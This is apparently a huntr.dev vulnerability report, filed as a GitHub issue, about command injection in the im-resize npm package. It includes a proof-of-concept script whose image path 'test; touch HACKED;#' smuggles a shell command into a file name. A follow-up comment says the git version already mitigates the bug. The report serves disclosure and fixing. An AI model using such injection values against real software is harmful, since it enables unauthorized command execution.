huntr.dev - Command Injection
huntr-helper opened this issue · 1 comments
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description
The issue occurs because a user input
is formatted inside a command
that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115
Steps To Reproduce:
- Create the following PoC file:
// poc.js
var resize = require('im-resize');
var image = {
path: 'test; touch HACKED;#',
width: 5184,
height: 2623
};
var output = {
versions: [{
suffix: '-thumb',
maxHeight: 150,
maxWidth: 150,
aspect: "3:2"
},{
suffix: '-square',
maxWidth: 200,
aspect: "1:1"
}]
};
resize(image, output, function(error){console.log()});
- Check there aren't files called
HACKED
- Execute the following commands in another terminal:
npm i im-resize # Install affected module
node poc.js # Run the PoC
- Recheck the files: now
HACKED
has been created
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
NPM version is vulnerable but I this bug is a false positive for git version, since code injection is mitigated in:
https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L10
In commit de624da of Feb 3
Instead of using npm version test should be executed against git version, after cloning like:
// poc.js
//var resize = require('im-resize');
var resize = require('./');
var image = {
path: 'test; touch HACKED;#',
width: 5184,
height: 2623
};
var output = {
versions: [{
suffix: '-thumb',
maxHeight: 150,
maxWidth: 150,
aspect: "3:2"
},{
suffix: '-square',
maxWidth: 200,
aspect: "1:1"
}]
};
resize(image, output, function(error){console.log()});
execute by:
npm i aspectratio # Install requiered module
node poc.js # Run the PoC
Will yield:
Input Validation failed, Suspicious Characters found
stopping execution and avoiding code injection
exec is called in https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L13 so trying to call directly https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115 will produce a string and not code execution.
PS. I would suggest granting the bounty considering the time it took me to test and document this as well as helping improve huntr bug quality